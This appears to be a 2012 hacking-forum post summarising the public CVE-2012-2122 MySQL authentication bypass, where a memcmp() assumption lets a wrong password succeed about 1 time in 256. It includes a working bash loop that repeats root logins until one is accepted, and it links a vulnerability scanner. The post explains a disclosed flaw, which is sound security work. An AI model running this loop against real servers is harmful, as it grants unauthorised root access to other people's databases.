EvilZone
Hacking and Security => Hacking and Security => Topic started by: relax on October 06, 2012, 01:35:51 AM
-
CVE-2012-2122: A Tragically Comedic Security Flaw in MySQL (https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql)^
This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -128 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.
In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>
for windows there is a scanner (http://www.rapid7.com/free-security-software-downloads/MySQL-vulnerability-scanner-CVE-2012-2122.jsp?mkt_tok=3RkMMJWWfF9wsRonsqjKZKXonjHpfsX56uQoXqO0lMI%2F0ER3fOvrPUfGjI4AScVjI%2FqLAzICFpZo2FFKG%2FCceNc%3D) ^